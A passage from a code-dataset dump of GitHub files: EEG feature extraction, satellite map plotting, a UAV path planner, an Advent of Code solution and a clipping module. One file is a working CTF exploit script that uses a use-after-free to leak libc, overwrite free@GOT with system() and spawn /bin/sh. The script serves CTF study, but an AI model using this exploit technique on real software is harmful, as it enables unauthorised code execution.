pipe.append(from_yaml_to_func(method, params))\n\n# create pipeline\npreproc = make_pipeline(*pipe)\n\n# parse pipe function from parameters\nif 'postproc' in yml.keys():\n pipe = []\n for item in yml['postproc']:\n for method, params in item.iteritems():\n pipe.append(from_yaml_to_func(method, params))\n\n # create pipeline\n postproc = make_pipeline(*pipe)\n\n\nreg = re.compile('.*(\\d)_(\\d*)_(\\d).mat')\nreg_test = re.compile('.*(new_%s_\\d*.mat)' % subject)\nreg_old_test = re.compile('.*(%s_\\d*.mat)' % subject)\nreg_fname = re.compile('.*(%s_\\d*_\\d.mat)' % subject)\n\n\ndef process_data_train(fname, ii):\n subj, indice, label = reg.findall(fname)[0]\n fn = reg_fname.findall(fname)[0]\n pbar.update(ii)\n data = loadmat(fname, squeeze_me=True, struct_as_record=False,\n verify_compressed_data_integrity=False)['dataStruct']\n\n out = preproc.fit_transform(np.array([data.data.T]))\n if len(out) == 1:\n out = out[0]\n val = np.sum(np.isnan(out)) == 0\n return out, val, int(label), int(indice), (int(indice) - 1) / 6, data.sequence, fn\n\n\ndef process_data_test(fname, ii, reg_test=reg_test):\n idx = reg_test.findall(fname)[0]\n pbar.update(ii)\n data = loadmat(fname, squeeze_me=True, struct_as_record=False,\n verify_compressed_data_integrity=False)['dataStruct']\n\n out = preproc.fit_transform(np.array([data.data.T]))\n if len(out) == 1:\n out = out[0]\n val = np.sum(np.isnan(out)) == 0\n\n return out, val, idx\n\nbase = '../data/train_%d/%d_' % (subject, subject)\nfnames = (sorted(glob(base + '*_0.mat'),\n key=lambda x: int(x.replace(base, '')[:-6])) +\n sorted(glob(base + '*_1.mat'),\n key=lambda x: int(x.replace(base, '')[:-6])))\n\n# ignore file not safe\nignore = pd.read_csv('../csv_files/train_and_test_data_labels_safe.csv', index_col=0)\n\nfnames_finals = []\nfor fname in fnames:\n ba = '../data/train_%d/' % subject\n fn = fname.replace(ba, '')\n if ignore.loc[fn, 'safe'] == 1:\n fnames_finals.append(fname)\nfnames = fnames_finals\n\npbar = ProgressBar(widgets=[Percentage(), Bar(), ETA()], maxval=len(fnames)).start()\n\n\nres = Parallel(n_jobs=njobs)(delayed(process_data_train)(fname=fname, ii=ii)\n for ii, fname in enumerate(fnames))\n\nfeatures, valid, y, idx, clips, sequence, fnames = zip(*res)\n\nfeatures = np.array(features)\nsequence = np.array(sequence)\nidx = np.array(idx)\ny = np.array(y)\nclips = np.array(clips)\nvalid = np.array(valid)\nfnames = np.array(fnames)\n\nif 'postproc' in yml.keys():\n print(\"\\npost process training data\")\n features = postproc.fit_transform(features[valid], y[valid])\n out_shape = list(features.shape)\n out_shape[0] = len(valid)\n features_final = np.ones(tuple(out_shape)) * np.nan\n features_final[valid] = features\nelse:\n features_final = features\n\nnp.savez('%s/train%d.npz' % (output, subject), features=features_final,\n y=y, sequence=sequence, idx=idx, clips=clips, valid=valid,\n fnames=fnames)\n# clear memory\nres = []\nfeatures = []\n\nprint('Done Training !!!')\n\nif options.old:\n base = '../data/test_%d/%d_' % (subject, subject)\n fnames = sorted(glob(base + '*.mat'),\n key=lambda x: int(x.replace(base, '')[:-4]))\n\n ignore = pd.read_csv('../csv_files/train_and_test_data_labels_safe.csv', index_col=0)\n\n fnames_finals = []\n for fname in fnames:\n ba = '../data/test_%d/' % subject\n fn = fname.replace(ba, '')\n if fn in ignore.index.values:\n fnames_finals.append(fname)\n\n #fnames = fnames_finals\n\n pbar = ProgressBar(widgets=[Percentage(), Bar(), ETA()],\n maxval=len(fnames)).start()\n\n res = Parallel(n_jobs=njobs)(delayed(process_data_test)(fname=fname, ii=ii, reg_test=reg_old_test)\n for ii, fname in enumerate(fnames))\n\n features, valid, idx = zip(*res)\n\n features = np.array(features)\n idx = np.array(idx)\n valid = np.array(valid)\n if 'postproc' in yml.keys():\n print(\"\\npost process test data\")\n features = postproc.transform(features[valid])\n out_shape = list(features.shape)\n out_shape[0] = len(valid)\n features_final = np.ones(tuple(out_shape)) * np.nan\n features_final[valid] = features\n else:\n features_final = features\n\n np.savez('%s/test%d.npz' % (output, subject), features=features_final,\n fnames=idx, valid=valid)\n print('Done Old Test !!!')\n # clear memory\n res = []\n features = []\nbase = '../data/test_%d_new/new_%d_' % (subject, subject)\nfnames = sorted(glob(base + '*.mat'),\n key=lambda x: int(x.replace(base, '')[:-4]))\n\npbar = ProgressBar(widgets=[Percentage(), Bar(), ETA()],\n maxval=len(fnames)).start()\n\nres = Parallel(n_jobs=njobs)(delayed(process_data_test)(fname=fname, ii=ii, reg_test=reg_test)\n for ii, fname in enumerate(fnames))\n\nfeatures, valid, idx = zip(*res)\n\nfeatures = np.array(features)\nidx = np.array(idx)\nvalid = np.array(valid)\nif 'postproc' in yml.keys():\n print(\"\\npost process test data\")\n features = postproc.transform(features[valid])\n out_shape = list(features.shape)\n out_shape[0] = len(valid)\n features_final = np.ones(tuple(out_shape)) * np.nan\n features_final[valid] = features\nelse:\n features_final = features\n\nnp.savez('%s/new_test%d.npz' % (output, subject), features=features_final,\n fnames=idx, valid=valid)\nprint('Done New Test!!!')\n","repo_name":"alexandrebarachant/kaggle-seizure-prediction-challenge-2016","sub_path":"Alex_Gilberto/generate_features.py","file_name":"generate_features.py","file_ext":"py","file_size_in_byte":7211,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"32"} +{"seq_id":"38520133567","text":"import cartopy\nimport cartopy.crs as ccrs\nimport cartopy.io.shapereader as shpreader\nimport cartopy.feature as cfeature\nfrom datetime import datetime\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport metpy\nimport numpy as np\nfrom netCDF4 import num2date\nfrom siphon.catalog import TDSCatalog\nimport xarray as xr\nfrom xarray.backends import NetCDF4DataStore\n\n# Grab the latest data from the data server.\ncat = TDSCatalog('https://thredds.ucar.edu/thredds/catalog/satellite'\n '/goes/east/products/CloudAndMoistureImagery/CONUS/Channel02'\n '/current/catalog.xml')\nlatest_data = cat.datasets[0]\n\n# Parse the data.\ndata = latest_data.remote_access(use_xarray=True)\nsat_data = data.metpy.parse_cf('Sectorized_CMI')\ngeos = sat_data.metpy.cartopy_crs\n\n# Extract cordinate information.\nx = sat_data.metpy.x\ny = sat_data.metpy.y\n\n# Correct reflectance.\nsat_data = np.sqrt(sat_data)\n\n# Set projection and colorbar information.\nfig = plt.figure(figsize=(10, 15))\n\nlc = ccrs.LambertConformal(central_longitude=-97.5, standard_parallels=(38.5,\n 38.5))\nax = fig.add_subplot(1, 1, 1, projection=lc)\nax.set_extent([-104.1, -95.5, 32.1, 39.1], crs=ccrs.PlateCarree())\nax.imshow(sat_data, extent=(x[0], x[-1], y[-1], y[0]), transform=geos,\n interpolation='none', cmap='Greys_r', origin='upper')\n\n# Create the map.\nax.add_feature(cfeature.OCEAN.with_scale('50m'),facecolor='slategrey',edgecolor='none',zorder=5)\nax.add_feature(cfeature.LAND.with_scale('50m'),edgecolor='dimgray',\n facecolor='#626262',\n zorder=0)\nax.add_feature(cfeature.BORDERS.with_scale('50m'),zorder=2)\nax.add_feature(cfeature.LAKES.with_scale('50m'),linewidth=.5,\n facecolor='lightsteelblue',\n edgecolor='dimgray',\n zorder=3)\nax.add_feature(cfeature.STATES.with_scale('50m'),linewidth=.5,\n edgecolor='black',\n zorder=6)\n\n# Import the county map.\nreader = shpreader.Reader('/home/victoraalvarez/Documents/pythonScripts'\n '/pythonPlayground/mapFiles/county_map/countyl010g.shp')\ncounties = list(reader.geometries())\nCOUNTIES = cfeature.ShapelyFeature(counties, ccrs.PlateCarree())\n\nax.add_feature(COUNTIES,linewidth=.5,facecolor='none',edgecolor='black',\n alpha=0.5, zorder=4)\n\n# Import the forecast area.\nreader = shpreader.Reader('/home/victoraalvarez/Documents/pythonScripts/'\n 'pythonPlayground/mapFiles/fa/fa3.shp')\nfa = list(reader.geometries())\nFA = cfeature.ShapelyFeature(fa, ccrs.PlateCarree())\n\nax.add_feature(FA,linewidth=2.5,facecolor='none',edgecolor='black',zorder=7)\nax.add_feature(FA,linewidth=.5,facecolor='none',edgecolor='white',zorder=8)\n\n# Add titles and timestamp.\ntimestamp = datetime.strptime(data.start_date_time, '%Y%j%H%M%S')\n\nplt.title('Valid Time: {}'.format(timestamp), loc='right')\nplt.title('GOES-EAST CONUS Ch. 2', loc='left')\n\n# Plot!\nplt.savefig('./images/VISIBLE.png', dpi=300, bbox_inches='tight')\n","repo_name":"victoraalvarez/pythonPlayground","sub_path":"plots/sat/visFM.py","file_name":"visFM.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71612980572","text":"from typing import Optional, Dict\n\nimport numpy as np\n\nfrom mapper.terrain_mapper import TerrainMapper\nfrom planner.common import compute_flight_time, Planner\n\n\nclass ImagePlanner(Planner):\n def __init__(\n self,\n mapper: TerrainMapper,\n altitude: float,\n sensor_info: Dict,\n uav_specifications: Dict,\n step_size: float,\n edge_width: float,\n objective_fn_name: str,\n ):\n super(ImagePlanner, self).__init__(mapper, altitude, sensor_info, uav_specifications, objective_fn_name)\n\n self.planner_name = \"image-based\"\n self.step_size = step_size\n self.edge_width = edge_width\n\n def replan(self, budget: float, previous_pose: np.array, **kwargs) -> Optional[np.array]:\n schematic_image = self.get_schematic_image(kwargs[\"uncertainty_image\"], kwargs[\"representation_image\"])\n\n boundary_space = self.altitude * np.tan(np.deg2rad(self.sensor_angle))\n max_y = self.mapper.map_boundary[1] * self.mapper.ground_resolution[1] - boundary_space[1]\n max_x = self.mapper.map_boundary[0] * self.mapper.ground_resolution[0] - boundary_space[0]\n\n # Sum uncertainty or representation score values on each image edge\n x_left_sum = np.sum(schematic_image[:, 0 : self.edge_width])\n x_right_sum = np.sum(schematic_image[:, -1 - self.edge_width : -1])\n y_bottom_sum = np.sum(schematic_image[0 : self.edge_width, :])\n y_top_sum = np.sum(schematic_image[-1 - self.edge_width : -1, :])\n schematic_values = np.array([x_left_sum, x_right_sum, y_bottom_sum, y_top_sum])\n\n # Sum train data count values on each image edge\n _, _, _, train_data_count_submap, _ = self.mapper.get_map_state(previous_pose)\n hit_x_left_sum = np.sum(train_data_count_submap[:, 0 : self.edge_width])\n hit_x_right_sum = np.sum(train_data_count_submap[:, -1 - self.edge_width : -1])\n hit_y_bottom_sum = np.sum(train_data_count_submap[0 : self.edge_width, :])\n hit_y_top_sum = np.sum(train_data_count_submap[-1 - self.edge_width : -1, :])\n hit_values = np.array([hit_x_left_sum, hit_x_right_sum, hit_y_bottom_sum, hit_y_top_sum])\n\n ind_array = np.argsort(schematic_values / hit_values)\n ind_array = np.flip(ind_array)\n\n i = 0\n new_pose = previous_pose\n\n while (previous_pose == new_pose).all():\n\n ind_max = ind_array[i]\n\n # Move left (x)\n if ind_max == 0:\n new_pose = previous_pose + [-self.step_size, 0, 0]\n # Move right (x)\n elif ind_max == 1:\n new_pose = previous_pose + [self.step_size, 0, 0]\n # Move down (y)\n elif ind_max == 2:\n new_pose = previous_pose + [0, -self.step_size, 0]\n # Move up (y)\n elif ind_max == 3:\n new_pose = previous_pose + [0, self.step_size, 0]\n\n new_pose[0] = np.clip(new_pose[0], boundary_space[0], max_x)\n new_pose[1] = np.clip(new_pose[1], boundary_space[1], max_y)\n\n i = i + 1\n\n if compute_flight_time(new_pose, previous_pose, self.uav_specifications) <= budget:\n return new_pose\n else:\n return None\n","repo_name":"dmar-bonn/ipp-al-framework","sub_path":"planner/local_planners.py","file_name":"local_planners.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"42044501628","text":"from functools import reduce\nfrom itertools import accumulate, zip_longest as zipl\nfrom operator import mul, xor\n\ndef reverse_sublist(l, a, b):\n if a <= b: l[a:b] = l[a:b][::-1]\n else: r = (l[a:]+l[:b])[::-1]; l[a:], l[:b] = r[:len(l)-a], r[-b or len(r):]\n\ndef hash_round(lens, elems, pos=0, skip=0, accumulator=lambda x, y: (y[0], reduce(sum, x))):\n for (skip, s), pos in accumulate(zipl(enumerate(lens, skip), [pos]), accumulator):\n reverse_sublist(elems, pos % len(elems), (pos+s) % len(elems))\n return elems, skip+s+pos, skip+1\n\ndef solve1(input, n=256):\n return mul(*hash_round([int(l) for l in input.split(',')], list(range(n)))[0][:2])\n\ndef solve2(input, n=256, g=16, rounds=64, suffix=[17, 31, 73, 47, 23], pos=0, skip=0):\n elems, lengths = [*range(n)], [ord(c) for c in input.strip()] + suffix\n for _ in range(rounds): elems, pos, skip = hash_round(lengths, elems, pos, skip)\n return bytes(reduce(xor, elems[g*k:g*(k+1)]) for k in range(n//g)).hex()\n\ndef inputStrip():\n return 'jxqlasbh'\n\n#matrix = ''.join(''.join('{:04b}'.format(int(x, 16)) for x in solve2('jxqlasbh-' + str(i))) for i in range(128))\n#part1 = matrix.count('1')\n#print(part1)\n#\n#part2 = 0\n#seen = set()\n#matrix = [list(map(int, l.strip())) for l in matrix.strip().split('\\n')]\n#rng = range(128)\n#for i, row in enumerate(matrix):\n# for j, bit in enumerate(row):\n# if bit and (i,j) not in seen:\n# part2 += 1\n# q = [(i,j)]\n# while q:\n# x, y = q.pop()\n# seen.add((x, y))\n# for x2, y2 in (x+1, y), (x-1, y), (x, y+1), (x, y-1):\n# if x2 in rng and y2 in rng and matrix[x2][y2] and (x2, y2) not in seen:\n# q.append((x2, y2))\n#print(part2)\n\ndata = 'jxqlasbh'\nrows = []\n\nn = 0\nfor i in range(128):\n v = solve2('%s-%d' % (data, i))\n v = '{:0128b}'.format(int(v, 16))\n n += sum(map(int, v))\n rows.append(list(map(int, v)))\n\nprint(n)\n\nseen = set()\nn = 0\ndef dfs(i, j):\n if ((i, j)) in seen:\n return\n if not rows[i][j]:\n return\n seen.add((i, j))\n if i > 0:\n dfs(i-1, j)\n if j > 0:\n dfs(i, j-1)\n if i < 127:\n dfs(i+1, j)\n if j < 127:\n dfs(i, j+1)\n\nfor i in range(128):\n for j in range(128):\n if (i,j) in seen:\n continue\n if not rows[i][j]:\n continue\n n += 1\n dfs(i, j)\n\nprint(n)","repo_name":"danksalot/AdventOfCode","sub_path":"2017/Day14/Example.py","file_name":"Example.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"46372103692","text":"from pwn import *\n\np = process('./main.elf')\n\ncontext(os='linux', arch='amd64')\n\ndef Pause():\n\tlog.success(\"Pausing...\")\n\traw_input()\n\ndef Allocate(name, attack = 1, defense = 2, speed = 3,precision = 4):\n\n\tlog.success(\"Allocating Player\")\n\tp.recvuntil(\"choice: \")\n\tp.sendline(\"1\")\n\n\tp.recvuntil(\"name: \")\n\tp.sendline(name)\n\n\tp.recvuntil(\"points: \")\n\tp.sendline(str(attack))\n\n\tp.recvuntil(\"points: \")\n\tp.sendline(str(defense))\n\n\tp.recvuntil(\"speed: \")\n\tp.sendline(str(speed))\n\n\tp.recvuntil(\"precision: \")\n\tp.sendline(str(precision))\n\n\tp.recvuntil(\"choice:\")\n\tp.sendline('6')\n\n\ndef Free(index):\n\n\tlog.success(\"Freeing Player at index: \" + str(index))\n\tp.recvuntil(\"choice:\")\n\tp.sendline(\"2\")\n\tp.recvuntil(\"index:\")\n\tp.sendline(str(index))\n\ndef Select(index):\n\tlog.success(\"Selecting Player at index: \" + str(index))\n\tp.recvuntil(\"choice:\")\n\tp.sendline(\"3\")\n\tp.recvuntil(\"index:\")\n\tp.sendline(str(index))\n\ndef TriggerLeak():\n\tlog.success(\"Triggering Use-After-Free\")\n\tp.recvuntil(\"choice:\")\n\tp.sendline('5')\n\tleak = p.recvline().split(\"Name: \")[1][:6].ljust(8, '\\x00')\n\tlog.success(\"Leaked free(): \" + str(leak))\n\treturn u64(leak)\n\ndef Execute():\n\n\tlog.success(\"Executing /bin/sh free()->system()\")\n\tp.sendline(\"0\")\n\tp.recvuntil(\"choice:\")\n\tp.sendline(\"2\")\n\tp.recvuntil(\"index:\")\n\tp.sendline(\"1\")\n\ndef OverwriteGOT(address):\n\n\tlog.success(\"Overwriting GOT\")\n\tp.sendline(\"4\")\n\tp.recvuntil(\"choice: \")\n\tp.sendline(\"1\")\n\tp.recvuntil(\"name:\")\n\tp.sendline(address)\n\ndef Exploit():\n\n\tlog.success(\"Sending Exploit\")\n\n\tplayer1 = \"A\" * 32\n\tplayer2 = \"B\" * 32\n\tfree_addr = 0x603018\n\n\tGOTentry = \"D\" * 16 + p64(free_addr)\n\tlibc_system = 0x45390\n\tlibc_free = 0x844f0\n\n\tAllocate(player1) # add_player() \n\tAllocate(player2) # add_player()\n\tSelect(\"1\") # select_player()\n\tFree(\"1\") # delete_player()\n\tFree(\"0\") # delete_player()\n\tlog.success(\"Overwriting 'name' Pointer\")\n\tAllocate(GOTentry) # add_player() # Overlap the heap object and overwrite the data structure\n\tlog.success(\"Pointer 'name' Overwritten\")\n\tleak = TriggerLeak() # show_player()\n\tlibc_base = leak - libc_free\n\tlog.success(\"libcbase: \" + p64(libc_base))\n\tsystem = libc_base + libc_system\n\tlog.success(\"system(): \" + p64(system))\n\tlog.success(\"Allocating Player with name /bin/sh\")\n\tAllocate(\"/bin/sh\") # add_player() \n\tOverwriteGOT(p64(system)) # set_name()\n\tlog.success(\"free@GOT Overwritten with system()\")\n\tExecute() # set_name()\n\tp.interactive()\n\nExploit()","repo_name":"r0t0tiller/CTF","sub_path":"Exploits/RHME3 CTF Quals/exploit2.py","file_name":"exploit2.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"2270446681","text":"#!/usr/bin/env python3\n\nfor i in range(1,2000):\n x = \"\"\"---\nname: f{n}\ndescription: Function Nr. {n}\nreturns: varchar\n---\nRETURN f{m}();\"\"\".format(n=i,m=i-1)\n with open(\"function-many/functions.d/f{}.sql\".format(i),\"w\") as f:\n f.write(x)\n","repo_name":"hemio-ev/hamsql","sub_path":"test/setups/mass.py","file_name":"mass.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"74581521370","text":"# -*- coding = utf-8 -*-\n# @Time : 2023/8/13 23:11\n# @Autor : 棒棒糖\n# @File : server.py\n# @Software : PyCharm\n\nfrom flask import Flask\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello_world():\n print(5/0)\n return 'Hello World!'\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000)","repo_name":"TangJinBiao-tjb/flask-t","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40266217948","text":"''' Transformations between coordinate systems and clipping. '''\n\nfrom __future__ import division\n\nclass Transformer(object):\n\t''' This class performs coordinate translation, scaling and clipping. '''\n\t\n\tTOP = 1\n\tBOTTOM = 2\n\tRIGHT = 4\n\tLEFT = 8\n\t\n\tdef __init__(self, original_x, original_y, original_w, original_h, space_w, space_h):\n\t\t''' Instantiates a transformer, setting the coordinates of the original\n\t\t space and the dimensions of the target one.\n\t\t\n\t\t It is assumed that the origin of the target space is (0, 0).\n\t\t\n\t\t @param original_x: the origin x coordinate of the original space.\n\t\t @param original_y: the origin y coordinate of the original space.\n\t\t @param original_w: the width of the original space.\n\t\t @param original_h: the height of the original space.\n\t\t @param space_w: the width of the target space.\n\t\t @param space_h: the height of the target space.\n\t\t'''\n\t\tassert original_w > 0, 'invalid width of the original space'\n\t\tassert original_h > 0, 'invalid height of the original space'\n\t\tassert space_w > 0, 'invalid width of the target space'\n\t\tassert space_h > 0, 'invalid height of the target space'\n\t\t\n\t\tself.original_x = original_x\n\t\tself.original_w = original_w\n\t\tself.original_y = original_y\n\t\tself.original_h = original_h\n\t\t\n\t\tself.space_w = space_w\n\t\tself.space_h = space_h\n\t\t\n\t\tself.scale_w = self.space_w / self.original_w\n\t\tself.scale_h = self.space_h / self.original_h\n\t\n\tdef transform_horizontal_region(self, x, w):\n\t\t''' Transforms an horizontal region from the original to the target\n\t\t space.\n\t\t\n\t\t @param x: the start coordinate of the region.\n\t\t @param w: the width of the region.\n\t\t @returns: the transformed (x, w) coordinates or (None, None) if\n\t\t the region is rejected.\n\t\t'''\n\t\tassert w > 0, 'invalid region width'\n\t\t\n\t\tif x + w < self.original_x or x > self.original_x + self.original_w:\n\t\t\treturn None, None\n\t\t\n\t\tx = (x - self.original_x) * self.scale_w\n\t\tw = w * self.scale_w\n\t\t\n\t\tif x < 0:\n\t\t\tw += x\n\t\t\tx = 0\n\t\tif x + w > self.space_w:\n\t\t\tw = self.space_w - x\n\t\t\n\t\treturn x, w\n\t\n\tdef transform_vertical_region(self, y, h):\n\t\t''' Transforms a vertical region from the original to the target\n\t\t space.\n\t\t\n\t\t @param y: the start coordinate of the region.\n\t\t @param h: the height of the region.\n\t\t @returns: the transformed (y, h) coordinates or (None, None) if\n\t\t the region is rejected.\n\t\t'''\n\t\tassert h > 0, 'invalid region width'\n\t\t\n\t\tif y + h < self.original_y or y > self.original_y + self.original_h:\n\t\t\treturn None, None\n\t\t\n\t\ty = (y - self.original_y) * self.scale_h\n\t\th = h * self.scale_h\n\t\t\n\t\tif y < 0:\n\t\t\th += y\n\t\t\ty = 0\n\t\tif y + h > self.space_h:\n\t\t\th = self.space_h - y\n\t\t\n\t\treturn y, h\n\t\n\tdef transform_segment(self, x1, y1, x2, y2):\n\t\t''' Transforms a segment from the original to the target space.\n\t\t\n\t\t @param x1: the x coordinate of the starting point.\n\t\t @param y1: the y coordinate of the stopping point.\n\t\t @param x2: the x coordinate of the stopping point.\n\t\t @param y2: the y coordinate of the stopping point.\n\t\t @returns: the transformed (x1, y1, x2, y2) coordinates or\n\t\t (None, None, None, None) if the segment is rejected.\n\t\t'''\n\t\t\n\t\t# translation & scaling\n\t\tw = (x2 - x1) * self.scale_w\n\t\th = (y2 - y1) * self.scale_h\n\t\t\n\t\tx1 = (x1 - self.original_x) * self.scale_w\n\t\tx2 = x1 + w\n\t\ty1 = (y1 - self.original_y) * self.scale_h\n\t\ty2 = y1 + h\n\t\t\n\t\t# clipping (Cohen & Sutherland)\n\t\tregion_code1 = self._comp_region_code(x1, y1)\n\t\tregion_code2 = self._comp_region_code(x2, y2)\n\t\t\n\t\twhile True:\n\t\t\tif not (region_code1 | region_code2):\n\t\t\t\treturn x1, y1, x2, y2\n\t\t\telif region_code1 & region_code2:\n\t\t\t\treturn None, None, None, None\n\t\t\telse:\n\t\t\t\toutside_code = region_code1 if region_code1 != 0 else region_code2\n\t\t\t\tif outside_code & self.TOP:\n\t\t\t\t\tx = x1 + (x2 - x1) * (self.space_h - y1) / (y2 - y1)\n\t\t\t\t\ty = self.space_h\n\t\t\t\telif outside_code & self.BOTTOM:\n\t\t\t\t\tx = x1 + (x2 - x1) * (-y1) / (y2 - y1)\n\t\t\t\t\ty = 0\n\t\t\t\telif outside_code & self.RIGHT:\n\t\t\t\t\ty = y1 + (y2 - y1) * (self.space_w - x1) / (x2 - x1)\n\t\t\t\t\tx = self.space_w\n\t\t\t\telse:\n\t\t\t\t\ty = y1 + (y2 - y1) * (-x1) / (x2 - x1)\n\t\t\t\t\tx = 0\n\t\t\t\t\n\t\t\t\tif outside_code == region_code1:\n\t\t\t\t\tx1 = x\n\t\t\t\t\ty1 = y\n\t\t\t\t\tregion_code1 = self._comp_region_code(x1, y1)\n\t\t\t\telse:\n\t\t\t\t\tx2 = x\n\t\t\t\t\ty2 = y\n\t\t\t\t\tregion_code2 = self._comp_region_code(x2, y2)\n\t\n\tdef _comp_region_code(self, x, y):\n\t\t''' Computes I{Cohen & Sutherland} region code for one point.\n\t\t\n\t\t @param x: the x coordinate of the point.\n\t\t @param y: the y coordinate of the point.\n\t\t @returns: the region code.\n\t\t'''\n\t\tcode = 0\n\t\t\n\t\tif y > self.space_h:\n\t\t\tcode |= self.TOP\n\t\telif y < 0:\n\t\t\tcode |= self.BOTTOM\n\t\t\n\t\tif x > self.space_w:\n\t\t\tcode |= self.RIGHT\n\t\telif x < 0:\n\t\t\tcode |= self.LEFT\n\t\t\n\t\treturn code\n","repo_name":"sales-lab/bitutils","sub_path":"src/vfork/draw/coords.py","file_name":"coords.py","file_ext":"py","file_size_in_byte":4809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35432602763","text":"from functools import reduce\nfrom shapely.geometry import Point\n\n\nclass GeocodeYandexPoint(Point):\n\n def __init__(self, metadata: {}):\n # A list of all the keys I have to traverse to get the coordinate point in the json file\n # so I can traverse the keys directly using the reduce function\n key_path = [\"response\", \"GeoObjectCollection\", \"featureMember\", 0, \"GeoObject\", \"Point\", \"pos\"]\n point_string = reduce(lambda p, c: p[c], key_path, metadata)\n coordinate_tuple = tuple(float(i) for i in point_string.split())\n\n # Instance the super class using the tuple of floats\n super().__init__(coordinate_tuple)\n","repo_name":"hendrixmar/MKAD-distance-api","sub_path":"app/yandex_geocode_model.py","file_name":"yandex_geocode_model.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73275022811","text":"\"\"\"\nWrite a function that accepts a target string an an array of strings. The\nfunction should return a 2D array containing all of the ways that the target cna\nbe constructed by concatenating elements of the wordBank array.\n\"\"\"\n\nfrom typing import Dict, List\n\n\ndef all_construct_recursive(target: str, word_bank: List[str]) -> List[List[str]]:\n if target == \"\":\n return [[]]\n result = []\n for word in word_bank:\n if target.startswith(word):\n suffix = target[len(word) :]\n suffix_ways = all_construct_recursive(suffix, word_bank)\n target_ways = [way + [word] for way in suffix_ways]\n if target_ways:\n result.extend(target_ways)\n return result\n\n\ndef all_construct_memo(\n target: str, word_bank: List[str], memo: Dict\n) -> List[List[str]]:\n if target in memo:\n return memo[target]\n if target == \"\":\n return [[]]\n result = []\n for word in word_bank:\n if target.startswith(word):\n suffix = target[len(word) :]\n suffix_ways = all_construct_memo(suffix, word_bank, memo)\n target_ways = [way + [word] for way in suffix_ways]\n if target_ways:\n result.extend(target_ways)\n memo[target] = result\n return result\n\n\ndef all_construct_tabulation(target: str, word_bank: List[str]) -> List[List[str]]:\n table = [[] for _ in range(len(target) + 1)]\n table[0] = [[]]\n for i in range(len(target)):\n for word in word_bank:\n if target[i : i + len(word)] == word:\n new_combinations = [combination + [word] for combination in table[i]]\n table[i + len(word)].extend(new_combinations)\n return table[-1]\n\n\nif __name__ == \"__main__\":\n assert (\n all_construct_recursive(\n target=\"purple\", word_bank=[\"purp\", \"p\", \"ur\", \"le\", \"purpl\"]\n )\n ) == [[\"le\", \"purp\"], [\"le\", \"p\", \"ur\", \"p\"]]\n assert (\n all_construct_memo(\n target=\"purple\", word_bank=[\"purp\", \"p\", \"ur\", \"le\", \"purpl\"], memo={}\n )\n ) == [[\"le\", \"purp\"], [\"le\", \"p\", \"ur\", \"p\"]]\n assert (\n all_construct_tabulation(\n target=\"purple\", word_bank=[\"purp\", \"p\", \"ur\", \"le\", \"purpl\"]\n )\n ) == [['purp', 'le'], ['p', 'ur', 'p', 'le']]\n","repo_name":"yudhiesh/Dynamic-Programming","sub_path":"all_construct.py","file_name":"all_construct.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35927525021","text":"import torch\nfrom torchvision import datasets, transforms\n\n# Define the transformations to apply to the Flowers102 data\ntransform_flowers102 = transforms.Compose([\n transforms.Resize((256, 256)),\n # transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # Normalize the image tensors\n])\n\n# Define the transformations to apply to the CIFAR-10 data\ntransform_cifar10 = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)) # Normalize the image tensors\n])\n\n\ndef get_data_loaders(dataset, batch_size=16, num_workers=2, return_dataset=False):\n \n # Define the training and test datasets\n\n if dataset == \"cifar10\":\n train_dataset = datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_cifar10)\n test_dataset = datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_cifar10)\n num_classes = 10\n \n elif dataset == \"flowers102\":\n train_dataset = datasets.Flowers102(root='./data', split=\"train\", download=True, transform=transform_flowers102)\n test_dataset = datasets.Flowers102(root='./data', split=\"test\", download=True, transform=transform_flowers102)\n num_classes = 102\n \n # Define the dataloaders to load the data in batches during training and testing\n train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=True, num_workers=num_workers)\n test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False, num_workers=num_workers)\n \n if return_dataset:\n return (train_loader, test_loader), num_classes, (train_dataset, test_dataset) \n else:\n return train_loader, test_loader, num_classes\n","repo_name":"devingarg/curriculum-learning","sub_path":"utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71426811291","text":"#!/usr/bin/env python\n\nfrom setuptools import setup\n\n# Version info -- read without importing\n_locals = {}\nwith open(\"releases/_version.py\") as fp:\n exec(fp.read(), None, _locals)\nversion = _locals[\"__version__\"]\n\nsetup(\n name=\"releases\",\n version=version,\n description=\"A Sphinx extension for changelog manipulation\",\n long_description=open(\"README.rst\").read(),\n 